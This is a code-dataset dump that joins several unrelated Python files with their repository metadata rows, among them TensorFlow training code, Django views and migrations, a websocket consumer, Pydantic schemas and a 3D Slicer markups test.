loss, train_op = BasicModelVAT.get_train_op(self, logits, y_test)
config = self.config
ENT_weight = config.ENT_weight
VAT_ENT_step_size = config.VAT_ENT_step_size
logits = self._unlabel_logits
s = tf.shape(logits)
s = s[0]
p = tf.stop_gradient(self.h_unlabel)
affinity_matrix = compute_logits(p, p) - (tf.eye(s, dtype=tf.float32) * 1000.0)
# logits = tf.Print(logits, [tf.shape(point_logits)])
ENT_loss = walking_penalty(logits, affinity_matrix)
loss += ENT_weight * ENT_loss
ENT_opt = tf.train.AdamOptimizer(VAT_ENT_step_size * self.learn_rate, name="Entropy-optimizer")
ENT_grads_and_vars = ENT_opt.compute_gradients(loss)
train_op = ENT_opt.apply_gradients(ENT_grads_and_vars)
for gradient, variable in ENT_grads_and_vars:
if gradient is None:
gradient = tf.constant(0.0)
self.adv_summaries.append(tf.summary.scalar("ENT/gradients/" + variable.name, l2_norm(gradient), family="Grads"))
self.adv_summaries.append(tf.summary.histogram("ENT/gradients/" + variable.name, gradient, family="Grads"))
self.summaries.append(tf.summary.scalar('entropy loss', ENT_loss))
return loss, train_op
| 33.824561 | 116 | 0.769191 | 287 | 1,928 | 4.923345 | 0.355401 | 0.070064 | 0.084218 | 0.029724 | 0.104742 | 0.079264 | 0.035386 | 0 | 0 | 0 | 0 | 0.007738 | 0.128631 | 1,928 | 56 | 117 | 34.428571 | 0.833333 | 0.026452 | 0 | 0 | 0 | 0 | 0.042712 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.307692 | 0 | 0.384615 | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6fa85d4b0b5bfa6ac386b4e088bb46a5cbd9b94a | 614 | py | Python | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | #coding: utf-8
from aip import AipSpeech
from config import DefaultConfig as opt
class composer():
def __init__(self):
pass
def compose(self,text ='你好'):
#百度后台获取的秘�?
APP_ID = opt.baidu_app_id
API_KEY = opt.baidu_api_key
SECRET_KEY =opt.baidu_secret_key
client = AipSpeech(APP_ID, API_KEY, SECRET_KEY)
result = client.synthesis(text,'zh',1,{
'vol':5,})
file_name = 'ans.mp3'
if not isinstance(result, dict):
with open(file_name, 'wb') as f:
f.write(result)
return file_name
| 26.695652 | 55 | 0.583062 | 82 | 614 | 4.146341 | 0.597561 | 0.044118 | 0.047059 | 0.064706 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001629 | 0.009524 | 0.315961 | 614 | 22 | 56 | 27.909091 | 0.797619 | 0.039088 | 0 | 0 | 0 | 0 | 0.027257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.058824 | 0.117647 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa9d472e775eb87721d162cdd4f797206aefbc8 | 264 | py | Python | scripts/makeToast.py | zgrannan/Technical-Theatre-Assistant | 8928e5f4f179f75f92035e898d102dd55f32e3f3 | [
"MIT"
] | 3 | 2017-01-05T20:02:23.000Z | 2017-10-02T19:55:58.000Z | scripts/makeToast.py | zgrannan/Technical-Theatre-Assistant | 8928e5f4f179f75f92035e898d102dd55f32e3f3 | [
"MIT"
] | 1 | 2016-05-17T20:20:19.000Z | 2016-05-17T20:20:28.000Z | scripts/makeToast.py | zgrannan/Technical-Theatre-Assistant | 8928e5f4f179f75f92035e898d102dd55f32e3f3 | [
"MIT"
] | null | null | null | #makes a toast with the given string ID
from sys import argv
def make_toast (string_id):
return "Toast.makeText(getBaseContext(), getString(R.string." + string_id + "), Toast.LENGTH_SHORT).show();"
if ( argv[0] == "makeToast.py" ):
print make_toast(argv[1])
| 24 | 109 | 0.708333 | 40 | 264 | 4.55 | 0.7 | 0.131868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008811 | 0.140152 | 264 | 10 | 110 | 26.4 | 0.792952 | 0.143939 | 0 | 0 | 0 | 0 | 0.419643 | 0.263393 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.2 | null | null | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fab9608b18da127d6b2008d803781b981e8468d | 334 | py | Python | crisiscleanup/calls/migrations/0011_merge_20180122_2308.py | CrisisCleanup/wcicp-call-service | 0a00e092625e2a48c9807737a4b72e343e1ab0b9 | [
"Apache-1.1"
] | null | null | null | crisiscleanup/calls/migrations/0011_merge_20180122_2308.py | CrisisCleanup/wcicp-call-service | 0a00e092625e2a48c9807737a4b72e343e1ab0b9 | [
"Apache-1.1"
] | null | null | null | crisiscleanup/calls/migrations/0011_merge_20180122_2308.py | CrisisCleanup/wcicp-call-service | 0a00e092625e2a48c9807737a4b72e343e1ab0b9 | [
"Apache-1.1"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-01-22 23:08
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('calls', '0010_auto_20180119_2117'),
('calls', '0007_auto_20180122_2157'),
]
operations = [
]
| 19.647059 | 48 | 0.658683 | 41 | 334 | 5.097561 | 0.829268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187023 | 0.215569 | 334 | 16 | 49 | 20.875 | 0.610687 | 0.203593 | 0 | 0 | 1 | 0 | 0.212928 | 0.174905 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fb000a6fd5b519a73bbb7413dd210206c96960d | 370 | py | Python | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | # https://www.geeksforgeeks.org/write-a-program-to-reverse-an-array-or-string/
# Time: O(n)
# Space: 1
def reverseByMiddles(arr):
n = len(arr)
limit = n//2
for i in range(limit):
temp = arr[i]
arr[i] = arr[(n-1)-i]
arr[(n-1)-i] = temp
return arr
arr = [1,2,3]
result = reverseByMiddles(arr)
print(result)
print(reverseByMiddles(arr = [1,2,3,4]))
| 18.5 | 78 | 0.627027 | 64 | 370 | 3.625 | 0.53125 | 0.24569 | 0.060345 | 0.051724 | 0.056034 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036066 | 0.175676 | 370 | 19 | 79 | 19.473684 | 0.72459 | 0.259459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fbe42378fbc286f445856d3f64bebf5d1265f7a | 1,173 | py | Python | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 43 | 2020-12-14T18:19:15.000Z | 2022-03-30T05:57:43.000Z | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 3 | 2021-02-19T09:56:35.000Z | 2022-03-30T13:26:50.000Z | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 16 | 2020-12-14T02:49:35.000Z | 2022-02-15T10:39:39.000Z | from pydantic import BaseModel, Field, EmailStr
class PostSchema(BaseModel):
id: int = Field(default=None)
title: str = Field(...)
content: str = Field(...)
class Config:
schema_extra = {
"example": {
"title": "Securing FastAPI applications with JWT.",
"content": "In this tutorial, you'll learn how to secure your application by enabling authentication using JWT. We'll be using PyJWT to sign, encode and decode JWT tokens...."
}
}
class UserSchema(BaseModel):
fullname: str = Field(...)
email: EmailStr = Field(...)
password: str = Field(...)
class Config:
schema_extra = {
"example": {
"fullname": "Abdulazeez Abdulazeez Adeshina",
"email": "abdulazeez@x.com",
"password": "weakpassword"
}
}
class UserLoginSchema(BaseModel):
email: EmailStr = Field(...)
password: str = Field(...)
class Config:
schema_extra = {
"example": {
"email": "abdulazeez@x.com",
"password": "weakpassword"
}
}
| 27.27907 | 191 | 0.535379 | 107 | 1,173 | 5.841122 | 0.53271 | 0.064 | 0.0624 | 0.0912 | 0.3856 | 0.3856 | 0.2608 | 0.2016 | 0.2016 | 0.2016 | 0 | 0 | 0.341006 | 1,173 | 42 | 192 | 27.928571 | 0.808538 | 0 | 0 | 0.5 | 0 | 0.029412 | 0.30179 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.117647 | 0.029412 | 0 | 0.441176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6fc58731a5e67b957a08a7b99ed3506623297e19 | 301 | py | Python | vk_bot/mods/other/counting.py | triangle1984/GLaDOS | 39dea7bf8043e791ef079ea1ac6616f95d5b5312 | [
"BSD-3-Clause"
] | 3 | 2019-12-12T05:48:34.000Z | 2020-12-07T19:23:41.000Z | vk_bot/mods/other/counting.py | anar66/vk-bot | 39dea7bf8043e791ef079ea1ac6616f95d5b5312 | [
"BSD-3-Clause"
] | 1 | 2019-11-15T14:28:49.000Z | 2019-11-15T14:28:49.000Z | vk_bot/mods/other/counting.py | triangle1984/vk-bot | 39dea7bf8043e791ef079ea1ac6616f95d5b5312 | [
"BSD-3-Clause"
] | 5 | 2019-11-20T14:20:30.000Z | 2022-02-05T10:37:01.000Z | from vk_bot.core.modules.basicplug import BasicPlug
import time
class Counting(BasicPlug):
command = ("отсчет",)
doc = "Отсчет от 1 до 3"
def main(self):
for x in range(3, -1, -1):
if x == 0:
return
self.sendmsg(x)
time.sleep(1)
| 25.083333 | 51 | 0.538206 | 41 | 301 | 3.926829 | 0.707317 | 0.186335 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 0.348837 | 301 | 11 | 52 | 27.363636 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0.07309 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6fc63d77d8ed73c401918b676d06084cc00b6c87 | 954 | py | Python | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | 1 | 2022-02-07T15:56:24.000Z | 2022-02-07T15:56:24.000Z | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | null | null | null | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | 1 | 2022-02-18T01:23:46.000Z | 2022-02-18T01:23:46.000Z | ## Copyright © 2021, Oracle and/or its affiliates.
## Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
#!/usr/bin/env python
from setuptools import setup
setup(name='wind-marketplace-library',
version="1.0.0",
description='Robot Framework test library for OCI Marketplace',
long_description='Robot Framework test library for OCI Marketplace',
classifiers=[
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Framework :: WIND Robot Framework',
],
author='arun.poonia@oracle.com',
author_email='arun.poonia@oracle.com',
packages=['MarketplaceLibrary'],
license = "UPL-1.0",
install_requires=[
],
extras_require={
'dev': [
]
},
platforms='any',
include_package_data=True,
zip_safe=False) | 31.8 | 105 | 0.634172 | 108 | 954 | 5.546296 | 0.685185 | 0.010017 | 0.083472 | 0.096828 | 0.176962 | 0.176962 | 0.176962 | 0.176962 | 0 | 0 | 0 | 0.018006 | 0.243187 | 954 | 30 | 106 | 31.8 | 0.810249 | 0.179245 | 0 | 0.083333 | 0 | 0 | 0.429306 | 0.087404 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fc8809070d19daecb0e75b0cf66f5240983ed79 | 1,392 | py | Python | api/views.py | oil-rope/oil-and-rope | 6d59c87d4809f120417a90c1624952085486bb06 | [
"MIT"
] | 8 | 2019-08-27T20:08:22.000Z | 2021-07-23T22:49:47.000Z | api/views.py | oil-rope/oil-and-rope | 6d59c87d4809f120417a90c1624952085486bb06 | [
"MIT"
] | 73 | 2020-03-11T18:07:29.000Z | 2022-03-28T18:07:47.000Z | api/views.py | oil-rope/oil-and-rope | 6d59c87d4809f120417a90c1624952085486bb06 | [
"MIT"
] | 4 | 2020-02-22T19:44:17.000Z | 2022-03-08T09:42:45.000Z | from django.http import JsonResponse
from django.shortcuts import reverse
from django.urls import NoReverseMatch
from django.views import View
from rest_framework import __version__ as drf_version
from rest_framework.exceptions import ValidationError
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework.viewsets import ViewSet
from oilandrope import __version__
class ApiVersionView(View):
http_method_names = ['get']
data = {
'version': __version__,
'powered_by': 'Django Rest Framework',
'drf_version': drf_version,
}
def get(self, request, *args, **kwargs):
return JsonResponse(self.data)
class URLResolverViewSet(ViewSet):
"""
Returns URL with given resolver and params.
"""
permission_classes = [AllowAny]
def resolve_url(self, request, *args, **kwargs):
data = request.data.copy()
if 'resolver' not in data:
raise ValidationError()
resolver = data.pop('resolver')
if isinstance(resolver, list):
resolver = resolver[0]
extra_params = {}
for key, value in data.items():
extra_params[key] = value
try:
url = reverse(resolver, kwargs=extra_params)
except NoReverseMatch:
url = '#no-url'
return Response({'url': url})
| 27.294118 | 56 | 0.66954 | 155 | 1,392 | 5.832258 | 0.425806 | 0.086283 | 0.094027 | 0.04646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000951 | 0.244253 | 1,392 | 50 | 57 | 27.84 | 0.858365 | 0.030891 | 0 | 0 | 0 | 0 | 0.058515 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.277778 | 0.027778 | 0.527778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6fdb320f11ce21ba2207772e25516617a4f09f64 | 310 | py | Python | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 12 | 2015-07-28T15:31:51.000Z | 2019-03-03T23:39:10.000Z | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 4 | 2017-01-25T05:24:17.000Z | 2019-04-03T00:25:13.000Z | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 33 | 2015-01-07T10:01:28.000Z | 2020-07-26T08:22:53.000Z | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
from setuptools import setup
import setuptools
setup(
name='contrail-server-manager',
version='0.1dev',
packages=setuptools.find_packages(exclude=["*.pyc"]),
zip_safe=False,
long_description="Server Manager package",
)
| 20.666667 | 64 | 0.716129 | 37 | 310 | 5.918919 | 0.810811 | 0.118721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022989 | 0.158065 | 310 | 14 | 65 | 22.142857 | 0.816092 | 0.2 | 0 | 0 | 0 | 0 | 0.229508 | 0.094262 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.222222 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fdc3aa267ad82108937792e25090869d2290abd | 6,272 | py | Python | Modules/Loadable/Markups/Testing/Python/MarkupsSceneViewRestoreTestManyLists.py | TheInterventionCentre/NorMIT-Plan-App | 765ed9a5dccc1cc134b65ccabe93fc132baeb2ea | [
"MIT"
] | null | null | null | Modules/Loadable/Markups/Testing/Python/MarkupsSceneViewRestoreTestManyLists.py | TheInterventionCentre/NorMIT-Plan-App | 765ed9a5dccc1cc134b65ccabe93fc132baeb2ea | [
"MIT"
] | null | null | null | Modules/Loadable/Markups/Testing/Python/MarkupsSceneViewRestoreTestManyLists.py | TheInterventionCentre/NorMIT-Plan-App | 765ed9a5dccc1cc134b65ccabe93fc132baeb2ea | [
"MIT"
] | null | null | null |
# Test restoring a scene with multiple lists with different number
# of fiducials
# first fiducial list
displayNode1 = slicer.vtkMRMLMarkupsDisplayNode()
slicer.mrmlScene.AddNode(displayNode1)
fidNode1 = slicer.vtkMRMLMarkupsFiducialNode()
fidNode1.SetName("FidNode1")
slicer.mrmlScene.AddNode(fidNode1)
fidNode1.SetAndObserveDisplayNodeID(displayNode1.GetID())
coords = [0.0, 0.0, 0.0]
numFidsInList1 = 5
for i in range(numFidsInList1):
fidNode1.AddFiducialFromArray(coords)
coords[0] += 1.0
coords[1] += 2.0
coords[2] += 1.0
# second fiducial list
displayNode2 = slicer.vtkMRMLMarkupsDisplayNode()
slicer.mrmlScene.AddNode(displayNode2)
fidNode2 = slicer.vtkMRMLMarkupsFiducialNode()
fidNode2.SetName("FidNode2")
slicer.mrmlScene.AddNode(fidNode2)
fidNode2.SetAndObserveDisplayNodeID(displayNode2.GetID())
numFidsInList2 = 10
for i in range(numFidsInList2):
fidNode2.AddFiducialFromArray(coords)
coords[0] += 1.0
coords[1] += 1.0
coords[2] += 3.0
sv = slicer.mrmlScene.AddNode(slicer.vtkMRMLSceneViewNode())
numFidNodesBeforeStore = slicer.mrmlScene.GetNumberOfNodesByClass('vtkMRMLMarkupsFiducialNode')
sv.StoreScene()
# add a third list that will get removed on restore
# second fiducial list
displayNode3 = slicer.vtkMRMLMarkupsDisplayNode()
slicer.mrmlScene.AddNode(displayNode3)
fidNode3 = slicer.vtkMRMLMarkupsFiducialNode()
fidNode3.SetName("FidNode3")
slicer.mrmlScene.AddNode(fidNode3)
fidNode3.SetAndObserveDisplayNodeID(displayNode3.GetID())
numFidsInList3 = 2
for i in range(numFidsInList3):
fidNode3.AddFiducialFromArray(coords)
coords[0] += 1.0
coords[1] += 2.0
coords[2] += 3.0
sv.RestoreScene()
numFidNodesAfterRestore = slicer.mrmlScene.GetNumberOfNodesByClass('vtkMRMLMarkupsFiducialNode')
if numFidNodesAfterRestore != numFidNodesBeforeStore:
print "After restoring the scene, expected ", numFidNodesBeforeStore, " fiducial nodes, but have ", numFidNodesAfterRestore
exceptionMessage = "After restoring the scene, expected " + str(numFidNodesBeforeStore) + " fiducial nodes, but have " + str(numFidNodesAfterRestore)
raise Exception(exceptionMessage)
#fid1AfterRestore = slicer.mrmlScene.GetNodeByID("vtkMRMLMarkupsFiducialNode1")
fid1AfterRestore = slicer.mrmlScene.GetFirstNodeByName("FidNode1")
numFidsInList1AfterRestore = fid1AfterRestore.GetNumberOfMarkups()
print "After restore, list with name FidNode1 has id ", fid1AfterRestore.GetID(), " and num fids = ", numFidsInList1AfterRestore
if numFidsInList1AfterRestore != numFidsInList1:
exceptionMessage = "After restoring list 1, id = " + fid1AfterRestore.GetID()
exceptionMessage += ", expected " + str(numFidsInList1) + " but got "
exceptionMessage += str(numFidsInList1AfterRestore)
raise Exception(exceptionMessage)
# fid2AfterRestore = slicer.mrmlScene.GetNodeByID("vtkMRMLMarkupsFiducialNode2")
fid2AfterRestore = slicer.mrmlScene.GetFirstNodeByName("FidNode2")
numFidsInList2AfterRestore = fid2AfterRestore.GetNumberOfMarkups()
print "After restore, list with name FidNode2 has id ", fid2AfterRestore.GetID(), " and num fids = ", numFidsInList2AfterRestore
if numFidsInList2AfterRestore != numFidsInList2:
exceptionMessage = "After restoring list 2, id = " + fid2AfterRestore.GetID()
exceptionMessage += ", expected " + str(numFidsInList2) + " but got "
exceptionMessage += str(numFidsInList2AfterRestore)
raise Exception(exceptionMessage)
# check the displayable manager for the right number of widgets/seeds
lm = slicer.app.layoutManager()
td = lm.threeDWidget(0)
ms = vtk.vtkCollection()
td.getDisplayableManagers(ms)
fidManagerIndex = -1
for i in range(ms.GetNumberOfItems()):
m = ms.GetItemAsObject(i)
if m.GetClassName() == "vtkMRMLMarkupsFiducialDisplayableManager3D":
fidManagerIndex = i
print m.GetClassName(), fidManagerIndex
if fidManagerIndex == -1:
exceptionMessage = "Failed to find markups fiducial displayable manager 3d!"
raise Exception(exceptionMessage)
mfm = ms.GetItemAsObject(fidManagerIndex)
h = mfm.GetHelper()
print 'Helper = ',h
seedWidget1 = h.GetWidget(fid1AfterRestore)
rep1 = seedWidget1.GetRepresentation()
print "Seed widget 1 has number of seeds = ",rep1.GetNumberOfSeeds()
if rep1.GetNumberOfSeeds() != numFidsInList1AfterRestore:
exceptionMessage = "After restoring list 1, expected seed widget to have "
exceptionMessage += str(numFidsInList1AfterRestore) + " seeds, but it has "
exceptionMessage += str(rep1.GetNumberOfSeeds())
raise Exception(exceptionMessage)
# check positions
for s in range(numFidsInList1AfterRestore):
seed = seedWidget1.GetSeed(s)
handleRep = seed.GetHandleRepresentation()
worldPos = handleRep.GetWorldPosition()
print "seed ",s," world position = ",worldPos
fidPos = [0.0,0.0,0.0]
fid1AfterRestore.GetNthFiducialPosition(s,fidPos)
xdiff = fidPos[0] - worldPos[0]
ydiff = fidPos[1] - worldPos[1]
zdiff = fidPos[2] - worldPos[2]
diffTotal = xdiff + ydiff + zdiff
if diffTotal > 0.1:
exceptionMessage = "List1: Difference between seed position " + str(s)
exceptionMessage += " and fiducial position totals = " + str(diffTotal)
raise Exception(exceptionMessage)
seedWidget2 = h.GetWidget(fid2AfterRestore)
rep2 = seedWidget2.GetRepresentation()
print "Seed widget 2 has number of seeds = ",rep2.GetNumberOfSeeds()
if rep2.GetNumberOfSeeds() != numFidsInList2AfterRestore:
exceptionMessage = "After restoring fid list 2, expected seed widget to have "
exceptionMessage += str(numFidsInList2AfterRestore) + " seeds, but it has "
exceptionMessage += str(rep2.GetNumberOfSeeds())
raise Exception(exceptionMessage)
# check positions
for s in range(numFidsInList2AfterRestore):
seed = seedWidget2.GetSeed(s)
handleRep = seed.GetHandleRepresentation()
worldPos = handleRep.GetWorldPosition()
print "seed ",s," world position = ",worldPos
fidPos = [0.0,0.0,0.0]
fid2AfterRestore.GetNthFiducialPosition(s,fidPos)
xdiff = fidPos[0] - worldPos[0]
ydiff = fidPos[1] - worldPos[1]
zdiff = fidPos[2] - worldPos[2]
diffTotal = xdiff + ydiff + zdiff
if diffTotal > 0.1:
exceptionMessage = "List2: Difference between seed position " + str(s)
exceptionMessage += " and fiducial position totals = " + str(diffTotal)
raise Exception(exceptionMessage)
ms.RemoveAllItems()
| 37.333333 | 151 | 0.772162 | 636 | 6,272 | 7.61478 | 0.234277 | 0.006195 | 0.007433 | 0.007433 | 0.348338 | 0.271319 | 0.253562 | 0.216395 | 0.207722 | 0.207722 | 0 | 0.029712 | 0.125319 | 6,272 | 167 | 152 | 37.556886 | 0.853081 | 0.07111 | 0 | 0.28 | 0 | 0 | 0.164287 | 0.016171 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.072 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fdd8bc73e2b49aa962aeebacd2ae774e4162d17 | 1,013 | py | Python | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | null | null | null | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | 12 | 2020-02-12T01:14:42.000Z | 2022-03-11T23:54:43.000Z | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
# @Time : 2019/7/21 12:35 PM
# @Author : __wutonghe__
# docs https://channels.readthedocs.io/en/latest/tutorial/part_3.html#rewrite-the-consumer-to-be-asynchronous
from channels.generic.websocket import AsyncWebsocketConsumer
import json
class MessageConsumer(AsyncWebsocketConsumer):
"""
私信websocket,采用异步通信来增加并发
"""
async def connect(self):
"""当 websocket 一链接上以后触发该函数"""
if self.scope['user'].is_anonymous:
await self.close()
else:
await self.channel_layer.group_add(self.scope['user'].username + '-message',self.channel_name) # 创建聊天室
await self.accept()
async def receive(self, text_data=None, bytes_data=None):
"""将答复交回给websocket"""
await self.send(text_data=json.dumps(text_data)) # 将消息发送给前端
async def disconnect(self, code):
"""断开链接时触发该函数"""
await self.channel_layer.group_discard(self.scope['user'].username + '-message',self.channel_name) # 将该链接移出聊天室
| 30.69697 | 119 | 0.669299 | 119 | 1,013 | 5.563025 | 0.638655 | 0.067976 | 0.058912 | 0.063444 | 0.208459 | 0.129909 | 0.129909 | 0.129909 | 0 | 0 | 0 | 0.01599 | 0.197433 | 1,013 | 32 | 120 | 31.65625 | 0.798278 | 0.228036 | 0 | 0 | 0 | 0 | 0.040404 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fe090a4e22c0963ebcb0f7db477cda0fa848e0e | 2,618 | py | Python | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | import eagerpy as ep
import numpy as np
from scipy.interpolate import RegularGridInterpolator
import hypney
tl = ep.numpy
def test_regular_grid_interpolator():
"""Adapted from
